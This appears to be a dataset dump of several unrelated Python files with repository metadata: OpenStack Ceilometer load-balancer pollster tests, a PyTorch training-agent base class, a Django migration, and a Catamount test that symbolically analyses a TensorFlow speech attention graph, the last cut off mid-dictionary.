self.pollster = lbaas.LBMemberPollster(self.CONF)
fake_members = self.fake_get_members()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'member_get_all',
return_value=fake_members))
@staticmethod
def fake_get_members():
return [{'status': 'ACTIVE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.3',
'status_description': None,
'id': '290b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'INACTIVE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.5',
'status_description': None,
'id': '2456661eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'PENDING_CREATE',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'UNKNOWN',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
{'status': 'error',
'protocol_port': 80,
'weight': 1,
'admin_state_up': True,
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'pool_id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'address': '10.0.0.6',
'status_description': None,
'id': '45630b61eb-07bc-4372-9fbf-36459dd0f96b'},
]
def test_get_samples_not_empty(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(4, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_members()[0][field],
samples[0].resource_metadata[field])
def test_pool_volume(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(1, samples[0].volume)
self.assertEqual(0, samples[1].volume)
self.assertEqual(2, samples[2].volume)
def test_get_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_members()))
self.assertEqual(set(['network.services.lb.member']),
set([s.name for s in samples]))
def test_members_discovery(self):
discovered_members = discovery.LBMembersDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(4, len(discovered_members))
for pool in self.fake_get_members():
if pool['status'] == 'error':
self.assertNotIn(pool, discovered_members)
else:
self.assertIn(pool, discovered_members)
class TestLBHealthProbePollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBHealthProbePollster, self).setUp()
self.pollster = lbaas.LBHealthMonitorPollster(self.CONF)
fake_health_monitor = self.fake_get_health_monitor()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'health_monitor_get_all',
return_value=fake_health_monitor))
@staticmethod
def fake_get_health_monitor():
return [{'id': '34ae33e1-0035-49e2-a2ca-77d5d3fab365',
'admin_state_up': True,
'tenant_id': "d5d2817dae6b42159be9b665b64beb0e",
'delay': 2,
'max_retries': 5,
'timeout': 5,
'pools': [],
'type': 'PING',
}]
def test_get_samples_not_empty(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_health_monitor()))
self.assertEqual(1, len(samples))
for field in self.pollster.FIELDS:
self.assertEqual(self.fake_get_health_monitor()[0][field],
samples[0].resource_metadata[field])
def test_get_meter_names(self):
samples = list(self.pollster.get_samples(
self.manager, {},
self.fake_get_health_monitor()))
self.assertEqual(set(['network.services.lb.health_monitor']),
set([s.name for s in samples]))
def test_probes_discovery(self):
discovered_probes = discovery.LBHealthMonitorsDiscovery(
self.CONF).discover(self.manager)
self.assertEqual(discovered_probes, self.fake_get_health_monitor())
class TestLBStatsPollster(_BaseTestLBPollster):
def setUp(self):
super(TestLBStatsPollster, self).setUp()
fake_pool_stats = self.fake_pool_stats()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_stats',
return_value=fake_pool_stats))
fake_pools = self.fake_get_pools()
self.useFixture(mockpatch.Patch('ceilometer.neutron_client.Client.'
'pool_get_all',
return_value=fake_pools))
@staticmethod
def fake_get_pools():
return [{'status': 'ACTIVE',
'lb_method': 'ROUND_ROBIN',
'protocol': 'HTTP',
'description': '',
'health_monitors': [],
'members': [],
'provider': 'haproxy',
'status_description': None,
'id': 'ce73ad36-437d-4c84-aee1-186027d3da9a',
'vip_id': 'cd6a6fee-e2fa-4e6c-b3c2-bfbe395752c1',
'name': 'mylb',
'admin_state_up': True,
'subnet_id': 'bbe3d818-bdcb-4e4b-b47f-5650dc8a9d7a',
'tenant_id': 'a4eb9f4938bb418bbc4f8eb31802fefa',
'health_monitors_status': []},
]
@staticmethod
def fake_pool_stats():
return {'stats': {'active_connections': 2,
'bytes_in': 1,
'bytes_out': 3,
'total_connections': 4
}
}
@mock.patch('ceilometer.pipeline.setup_pipeline', mock.MagicMock())
def _check_get_samples(self, factory, sample_name, expected_volume,
expected_type):
pollster = factory(self.CONF)
cache = {}
samples = list(pollster.get_samples(self.manager, cache,
self.fake_get_pools()))
self.assertEqual(1, len(samples))
self.assertIsNotNone(samples)
self.assertIn('lbstats', cache)
self.assertEqual(set([sample_name]), set([s.name for s in samples]))
match = [s for s in samples if s.name == sample_name]
self.assertEqual(1, len(match), 'missing counter %s' % sample_name)
self.assertEqual(expected_volume, match[0].volume)
self.assertEqual(expected_type, match[0].type)
def test_lb_total_connections(self):
self._check_get_samples(lbaas.LBTotalConnectionsPollster,
'network.services.lb.total.connections',
4, 'cumulative')
def test_lb_active_connections(self):
self._check_get_samples(lbaas.LBActiveConnectionsPollster,
'network.services.lb.active.connections',
2, 'gauge')
def test_lb_incoming_bytes(self):
self._check_get_samples(lbaas.LBBytesInPollster,
'network.services.lb.incoming.bytes',
1, 'gauge')
def test_lb_outgoing_bytes(self):
self._check_get_samples(lbaas.LBBytesOutPollster,
'network.services.lb.outgoing.bytes',
3, 'gauge')
| 42.478431
| 76
| 0.537851
|
ba323774a59b547fd8a938faf28e9dfff1cccac3
| 15,039
|
py
|
Python
|
deepkt/agents/base.py
|
persai-lab/EDM2020-DMKT
|
ded1e76a5908432f5b927fc3bda7c0e059e2bc00
|
[
"MIT"
] | 4
|
2021-05-28T13:15:18.000Z
|
2021-12-15T22:29:28.000Z
|
deepkt/agents/base.py
|
persai-lab/EDM2021-DMKT
|
ded1e76a5908432f5b927fc3bda7c0e059e2bc00
|
[
"MIT"
] | null | null | null |
deepkt/agents/base.py
|
persai-lab/EDM2021-DMKT
|
ded1e76a5908432f5b927fc3bda7c0e059e2bc00
|
[
"MIT"
] | null | null | null |
"""
The Base Agent class, where all other agents inherit from, that contains definitions for all the necessary functions
"""
import logging
import torch
import shutil
import numpy as np
from sklearn import metrics
import pickle
import torch.nn as nn
from tensorboardX.writer import SummaryWriter
from deepkt.utils.metrics import AverageMeter, AverageMeterList
class BaseAgent:
"""
This base class will contain the base functions to be overloaded by any agent you will implement.
"""
def __init__(self, config):
self.config = config
self.logger = logging.getLogger("Agent")
self.current_epoch = None
self.current_iteration = None
self.model = None
self.optimizer = None
self.data_loader = None
# initialize counter
self.current_epoch = 0
self.current_iteration = 0
self.best_metric = 0
# set cuda flag
self.is_cuda = torch.cuda.is_available()
if self.is_cuda and not self.config.cuda:
self.logger.info("WARNING: You have a CUDA device, so you should probably enable CUDA")
self.cuda = self.is_cuda & self.config.cuda
# set the manual seed for torch
self.manual_seed = config.seed
self.mode = config.mode
self.device = torch.device("cpu")
# Summary Writer
self.summary_writer = None
self.true_labels = None
self.pred_labels = None
self.best_epoch = None
self.train_loss = None
self.train_loss_list = []
self.best_train_loss = None
self.best_val_perf = None
self.metric = config.metric
self.save = config.save_checkpoint
if self.metric == "rmse":
self.best_val_perf = 1.
elif self.metric == "auc":
self.best_val_perf = 0.
else:
raise AttributeError
if "target_train_loss" in config:
self.target_train_loss = config.target_train_loss
else:
self.target_train_loss = None
def load_checkpoint(self, file_name):
"""
Latest checkpoint loader
:param file_name: name of the checkpoint file
:return:
"""
filename = self.config.checkpoint_dir + file_name
try:
self.logger.info("Loading checkpoint '{}'".format(filename))
checkpoint = torch.load(filename)
self.current_epoch = checkpoint['epoch']
self.current_iteration = checkpoint['iteration']
self.model.load_state_dict(checkpoint['state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.logger.info(f"Checkpoint loaded successfully from '{self.config.checkpoint_dir}' "
f"at (epoch {checkpoint['epoch']}) at (iteration "
f"{checkpoint['iteration']})\n")
except OSError as e:
self.logger.info(f"No checkpoint exists from '{self.config.checkpoint_dir}'. "
f"Skipping...")
self.logger.info("**First time to train**")
def save_checkpoint(self, file_name="checkpoint.pth.tar", is_best=0):
"""
Checkpoint saver
:param file_name: name of the checkpoint file
:param is_best: boolean flag to indicate whether current checkpoint's accuracy is
the best so far
:return:
"""
state = {
'epoch': self.current_epoch,
'iteration': self.current_iteration,
'state_dict': self.model.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
# Save the state
torch.save(state, self.config.checkpoint_dir + file_name)
# If it is the best copy it to another file 'model_best.pth.tar'
if is_best:
shutil.copyfile(self.config.checkpoint_dir + file_name,
self.config.checkpoint_dir + 'model_best.pth.tar')
def save_results(self):
torch.save(self.true_labels, self.config.out_dir + "true_labels.tar")
torch.save(self.pred_labels, self.config.out_dir + "pred_labels.tar")
def track_best(self, true_labels, pred_labels):
self.pred_labels = np.array(pred_labels).squeeze()
self.true_labels = np.array(true_labels).squeeze()
self.logger.info(
"pred size: {} true size {}".format(self.pred_labels.shape, self.true_labels.shape))
if self.metric == "rmse":
perf = np.sqrt(metrics.mean_squared_error(self.true_labels, self.pred_labels))
self.logger.info('RMSE: {:.05}'.format(perf))
if perf < self.best_val_perf:
self.best_val_perf = perf
self.best_train_loss = self.train_loss.item()
self.best_epoch = self.current_epoch
elif self.metric == "auc":
perf = metrics.roc_auc_score(self.true_labels, self.pred_labels)
prec, rec, _ = metrics.precision_recall_curve(self.true_labels, self.pred_labels)
pr_auc = metrics.auc(rec, prec)
self.logger.info('ROC-AUC: {:.05}'.format(perf))
self.logger.info('PR-AUC: {:.05}'.format(pr_auc))
if perf > self.best_val_perf:
self.best_val_perf = perf
self.best_train_loss = self.train_loss.item()
self.best_epoch = self.current_epoch
else:
raise AttributeError
def early_stopping(self):
if self.mode == "test":
if self.target_train_loss is not None and self.train_loss <= self.target_train_loss:
# early stop, target train loss comes from hyperparameters tuning step.
self.logger.info("Early stopping...")
self.logger.info("Target Train Loss: {}".format(self.target_train_loss))
self.logger.info("Current Train Loss: {}".format(self.train_loss))
return True
# elif self.current_epoch > 10:
# if self.train_loss > torch.mean(self.train_loss_list[-10:]):
# return True
# else:
# self.train_loss_list.append(self.train_loss)
def run(self):
"""
The main operator
:return:
"""
if self.mode in ["train", "test"]:
try:
self.train()
except KeyboardInterrupt:
self.logger.info("You have entered CTRL+C.. Wait to finalize")
elif self.mode == "predict":
self.predict()
else:
print(self.mode)
raise ValueError
def train(self):
"""
Main training loop
:return:
"""
raise NotImplementedError
def train_one_epoch(self):
"""
One epoch of training
:return:
"""
raise NotImplementedError
def validate(self):
"""
One cycle of model validation
:return:
"""
raise NotImplementedError
def finalize(self):
"""
Finalize all the operations of the 2 Main classes of the process.py the operator and the data loader
:return:
"""
self.logger.info("Please wait while finalizing the operation.. Thank you")
self.logger.info("Saving checkpoint...")
if self.save is True:
self.save_checkpoint()
self.save_results()
# self.summary_writer.export_scalars_to_json(
# "{}all_scalars.json".format(self.config.summary_dir))
# self.summary_writer.close()
self.data_loader.finalize()
return self.best_epoch, self.best_train_loss, self.best_val_perf
# def depict_knowledge_quiz_only(self, q_data, qa_data, l_data, idx):
# if self.metric == "rmse":
# qa_data = qa_data.float()
# # batch_size, seq_len = q_data.size(0), q_data.size(1)
# batch_size, seq_len, lec_len = l_data.size(0), l_data.size(1), l_data.size(2)
# self.model.value_matrix = torch.Tensor(self.model.num_concepts, self.model.value_dim).to(
# self.device)
# nn.init.normal_(self.model.value_matrix, mean=0., std=self.model.init_std)
# self.model.value_matrix = self.model.value_matrix.clone().repeat(batch_size, 1, 1)
#
# q_embed_data = self.model.q_embed_matrix(q_data)
# qa_embed_data = self.model.qa_embed_matrix(qa_data)
# # split the data seq into chunk and process.py each question sequentially
# sliced_q_embed_data = torch.chunk(q_embed_data, seq_len, dim=1)
# sliced_qa_embed_data = torch.chunk(qa_embed_data, seq_len, dim=1)
#
# l_read_content = torch.Tensor(batch_size, self.model.value_dim).to(self.device)
# ls = torch.Tensor(batch_size, self.model.value_dim).to(self.device)
# sliced_l_data = torch.chunk(l_data, seq_len, dim=1) # seq_len * (batch_size, 1, lec_len)
#
# knowledge_state = []
# for i in range(seq_len):
# qid = q_data.squeeze()[i]
# print("question: {}".format(qid))
# if qid == 0:
# continue
#
# q = sliced_q_embed_data[i].squeeze(1) # (batch_size, key_dim)
# qa = sliced_qa_embed_data[i].squeeze(1) # (batch_size, key_dim)
# q_correlation_weight = self.model.compute_correlation_weight(q)
# q_read_content = self.model.read(q_correlation_weight)
#
# masked_summary_fc = nn.Linear(2 * self.model.key_dim + 2 * self.model.value_dim,
# self.model.summary_dim).to(self.device)
# mask_used = torch.zeros(
# self.model.summary_dim,
# 2 * self.model.key_dim + 2 * self.model.value_dim
# ).to(self.device)
# mask_used[:, :self.model.key_dim] = 1.
#
# # print(self.model.state_dict()["summary_fc.weight"].shape)
# # print(mask_used.shape)
# masked_summary_fc.weight.data = self.model.state_dict()["summary_fc.weight"] * mask_used
# masked_summary_fc.bias.data = self.model.state_dict()["summary_fc.bias"]
# cws = torch.eye(self.model.num_concepts).to(self.device)
# current_state = []
# for cw in cws:
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# read_content = self.model.read(cw)
# mastery_level = torch.cat([read_content, q, l_read_content, ls], dim=1)
# summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# current_state.append(batch_sliced_pred.squeeze().item())
# knowledge_state.append(current_state)
# self.model.value_matrix = self.model.write(q_correlation_weight, qa)
#
# # after update value_matrix with qa_data, we test the knowledge
# # should not change the order of code
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# # (batch_size, 128, value_dim)
# l_embed_data = self.model.l_embed_matrix(sliced_l_data[i].squeeze(1).long())
# # print(l_embed_data.shape)
# sliced_l_embed_data = torch.chunk(l_embed_data, lec_len, dim=1)
# # 128 * (batch_size, 1, value_dim)
#
#
# # masked_summary_fc = nn.Linear(2 * self.model.key_dim + 2 * self.model.value_dim,
# # self.model.summary_dim).to(self.device)
# # mask_used = torch.zeros(self.model.summary_dim,
# # 2 * self.model.key_dim + 2 * self.model.value_dim).to(
# # self.device)
# # mask_used[:, 2 * self.model.key_dim:3 * self.model.key_dim] = 1.
# # masked_summary_fc.weight.data = self.model.state_dict()["summary_fc.weight"] * mask_used
# # masked_summary_fc.bias.data = self.model.state_dict()["summary_fc.bias"]
# #
# # cws = torch.eye(self.model.num_concepts).to(self.device)
# # current_state = []
# # for cw in cws:
# # read_content = self.model.read(cw)
# # mastery_level = torch.cat([q_read_content, q, read_content, ls], dim=1)
# # summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# # batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# # current_state.append(batch_sliced_pred.squeeze().item())
# # knowledge_state.append(current_state)
#
# nn.init.zeros_(l_read_content)
# nn.init.zeros_(ls)
# # (batch_size, 128, value_dim)
# l_embed_data = self.model.l_embed_matrix(sliced_l_data[i].squeeze(1).long())
# # print(l_embed_data.shape)
# sliced_l_embed_data = torch.chunk(l_embed_data, lec_len, dim=1)
# # 128 * (batch_size, 1, value_dim)
# for j in range(lec_len):
# l = sliced_l_embed_data[j].squeeze(1) # (batch_size, value_dim)
# l_correlation_weight = self.model.compute_correlation_weight(l)
# l_read_content += self.model.read(l_correlation_weight)
# self.model.value_matrix = self.model.write(l_correlation_weight, l)
# ls += l
#
# # get the knowledge transition over different lectures
# # print("lectures: {}".format(sliced_l_data[i].squeeze(1)))
# # for j in range(lec_len):
# # if sliced_l_data[i].squeeze(1).squeeze(0)[j] == 0:
# # continue
# #
# # current_state = []
# # cws = torch.eye(self.model.num_concepts).to(self.device)
# # for cw in cws:
# # read_content = self.model.read(cw)
# # mastery_level = torch.cat([q_read_content, q, read_content, ls], dim=1)
# # summary_output = self.model.tanh(masked_summary_fc(mastery_level))
# # batch_sliced_pred = self.model.sigmoid(self.model.linear_out(summary_output))
# # current_state.append(batch_sliced_pred.squeeze().item())
# #
# # l = sliced_l_embed_data[j].squeeze(1) # (batch_size, value_dim)
# # l_correlation_weight = self.model.compute_correlation_weight(l)
# # l_read_content = self.model.read(l_correlation_weight)
# # self.model.value_matrix = self.model.write(l_correlation_weight, l)
# # ls += l
# # knowledge_state.append(current_state)
#
# knowledge_state = np.array(knowledge_state)
# print(knowledge_state.shape)
# torch.save(knowledge_state, self.config.out_dir + "K_{}.pkl".format(idx))
| 44.758929
| 116
| 0.587606
|
e8aa74c5fe301a4826d146850852432194386fa6
| 397
|
py
|
Python
|
store/migrations/0007_alter_product_slug.py
|
LhermannSauer/online-store_Django-project_-codewithMosh
|
5c00588caadfefba65b6d0bab4fae5058cdddee4
|
[
"MIT"
] | null | null | null |
store/migrations/0007_alter_product_slug.py
|
LhermannSauer/online-store_Django-project_-codewithMosh
|
5c00588caadfefba65b6d0bab4fae5058cdddee4
|
[
"MIT"
] | null | null | null |
store/migrations/0007_alter_product_slug.py
|
LhermannSauer/online-store_Django-project_-codewithMosh
|
5c00588caadfefba65b6d0bab4fae5058cdddee4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-09-02 01:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0006_alter_product_collection'),
]
operations = [
migrations.AlterField(
model_name='product',
name='slug',
field=models.SlugField(blank=True, null=True),
),
]
| 20.894737
| 58
| 0.602015
|
be681f7296bcf49ab215efeda4f2ca8630296468
| 36,381
|
py
|
Python
|
catamount/tests/full/tf_speech_attention.py
|
baidu-research/catamount
|
4591f797bb9a8a70598c6d5a85551a6ec92ef7e3
|
[
"Apache-2.0"
] | 13
|
2018-12-18T04:09:22.000Z
|
2020-08-17T22:51:25.000Z
|
dl_modifier/tests/full/tf_speech_attention.py
|
nikkkkhil/dl_modifier
|
d9c3f7c31db54e51aa5fa2bca2688f337a7f318f
|
[
"Apache-2.0"
] | 6
|
2018-12-20T00:21:00.000Z
|
2019-08-01T02:01:12.000Z
|
dl_modifier/tests/full/tf_speech_attention.py
|
nikkkkhil/dl_modifier
|
d9c3f7c31db54e51aa5fa2bca2688f337a7f318f
|
[
"Apache-2.0"
] | 4
|
2018-11-23T19:14:25.000Z
|
2019-10-28T07:53:03.000Z
|
import numpy as np
import pickle
import sympy
import sys
sys.setrecursionlimit(50000)
from catamount.api import utils
import catamount.frameworks.tensorflow
from catamount.ops.constant import *
from catamount.ops.unknown_op import UnknownOp
from catamount.ops.variable import *
is_pytest_run = False
def test_tf_speech_attention():
global is_pytest_run
is_pytest_run = True
run_tf_speech_attention()
def run_tf_speech_attention():
global is_pytest_run
graph_meta = 'catamount/frameworks/example_graphs/tensorflow/full_models/speech_attention/model.ckpt.meta'
graph = catamount.frameworks.tensorflow.import_graph(graph_meta)
assert graph.isValid()
# HAX: NEED TO MANUALLY REMOVE SOME?! WHY?
remove_ops = ['DevArgmaxWERChecker/Less', 'DevLossChecker/Less', 'DevArgmaxWERChecker/best_dev', 'DevLossChecker/best_dev']
for op_name in remove_ops:
op = graph.opsByName[op_name]
graph.removeOp(op)
assert graph.isValid()
# Remove ops that are not executed during a standard training step:
graph_ops = list(graph._ops_by_name.values())
for op in graph_ops:
# Ops in attn_model_[1-3] are used for inference
if 'attn_model_1' in op.name or \
'attn_model_2' in op.name or \
'attn_model_3' in op.name:
graph.removeOp(op)
assert graph.isValid()
print('Initial graph:\n{}\n'.format(graph))
init_params = graph.calcModelParameters()
print('Initial parameters: {}'.format(init_params))
print('Initial Flops: {}\n'.format(graph.calcAlgFlops()))
print('Placeholders:')
for op in graph.getPlaceholders():
print(op.debugString())
print('')
# Set up symbols to name dimensions
audio_features_symbol = utils.getPositiveIntSymbolFromString('audio_features')
encoder_steps_symbol = utils.getPositiveIntSymbolFromString('encoder_steps')
decoder_steps_symbol = utils.getPositiveIntSymbolFromString('decoder_steps')
subbatch_size_symbol = utils.getPositiveIntSymbolFromString('subbatch_size')
attn_dim_symbol = utils.getPositiveIntSymbolFromString('attn_dim')
attn_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('attn_hidden_dim')
dec_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('dec_hidden_dim')
enc_hidden_dim_symbol = utils.getPositiveIntSymbolFromString('enc_hidden_dim')
graph_iters_symbol = utils.getIntSymbolFromString('graph::iters')
output_vocab_symbol = utils.getPositiveIntSymbolFromString('output_vocab')
conv_width_symbol = utils.getPositiveIntSymbolFromString('conv_width')
num_conv_filters_symbol = utils.getPositiveIntSymbolFromString('num_conv_filters')
# Convert these constant dimensions to symbols
base_encoder_steps = 300
base_decoder_steps = 300
base_subbatch_size = 32
base_output_vocab = 31
base_audio_features = 40
base_conv_width = 53
base_attn_dim = 137
base_attn_hidden_dim = 509
base_dec_hidden_dim = 571
base_enc_hidden_dim = 1051
base_enc_input_dim = 1091 # Input + recurrent state
enc_input_dim_symbol = audio_features_symbol + enc_hidden_dim_symbol
base_dec_attn_rec = 2133
dec_attn_rec_symbol = 2 * enc_hidden_dim_symbol + output_vocab_symbol
base_attn_cell_inputs = 2611
attn_cell_inputs_symbol = 2 * enc_hidden_dim_symbol + attn_hidden_dim_symbol
base_attn_cell_in_dim = 2642
attn_cell_in_dim_symbol = 2 * enc_hidden_dim_symbol + output_vocab_symbol + \
attn_hidden_dim_symbol
base_dec_attn_dim = 3182
dec_attn_dim_symbol = attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + \
dec_hidden_dim_symbol
bind_dict = { # Placeholders
'attn_model/input_seq': [encoder_steps_symbol, subbatch_size_symbol, audio_features_symbol],
'attn_model/input_len': [subbatch_size_symbol],
'attn_model/output_seq': [decoder_steps_symbol, subbatch_size_symbol],
'attn_model/output_mask': [decoder_steps_symbol, subbatch_size_symbol],
# Variables
'InputNormalizer/means': [audio_features_symbol],
'InputNormalizer/std': [audio_features_symbol],
'attn_model/AffineAttentionStateNN/W': [2 * enc_hidden_dim_symbol, attn_dim_symbol],
'attn_model/AffineAttentionStateNN/b': [attn_dim_symbol],
'attn_model/AffineOutputProjection/W': [dec_hidden_dim_symbol, output_vocab_symbol],
'attn_model/AffineOutputProjection/b': [output_vocab_symbol],
'attn_model/Decoder/attn_model/attention_cell/biases': [4 * attn_hidden_dim_symbol],
'attn_model/Decoder/attn_model/attention_cell/weights': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/Decoder/attn_model/decoder_cell/biases': [4 * dec_hidden_dim_symbol],
'attn_model/Decoder/attn_model/decoder_cell/weights': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/HybridAttentionContext/Q': [conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/HybridAttentionContext/U': [1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/HybridAttentionContext/W': [2 * attn_hidden_dim_symbol, attn_dim_symbol],
'attn_model/HybridAttentionContext/b': [attn_dim_symbol],
'attn_model/HybridAttentionContext/w': [attn_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/bias': [4 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/basic_lstm_cell/kernel': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
# Constants
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/MatMul/Enter_grad/b_acc': [dec_hidden_dim_symbol, output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/add/Enter_grad/b_acc': [output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/MatMul/Enter_grad/b_acc': [2 * attn_hidden_dim_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/add_2/Enter_grad/b_acc': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/attention_cell/BiasAdd/Enter_grad/b_acc': [4 * attn_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/attention_cell/attention_cell/add/Enter_grad/b_acc': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/ExpandDims_1/Enter_grad/b_acc': [conv_width_symbol, 1, 4],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/ExpandDims_1/Enter_grad/b_acc': [1, 4, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/decoder_cell/BiasAdd/Enter_grad/b_acc': [4 * dec_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/decoder_cell/decoder_cell/add/Enter_grad/b_acc': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/mul/Enter_grad/b_acc': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [audio_features_symbol + enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
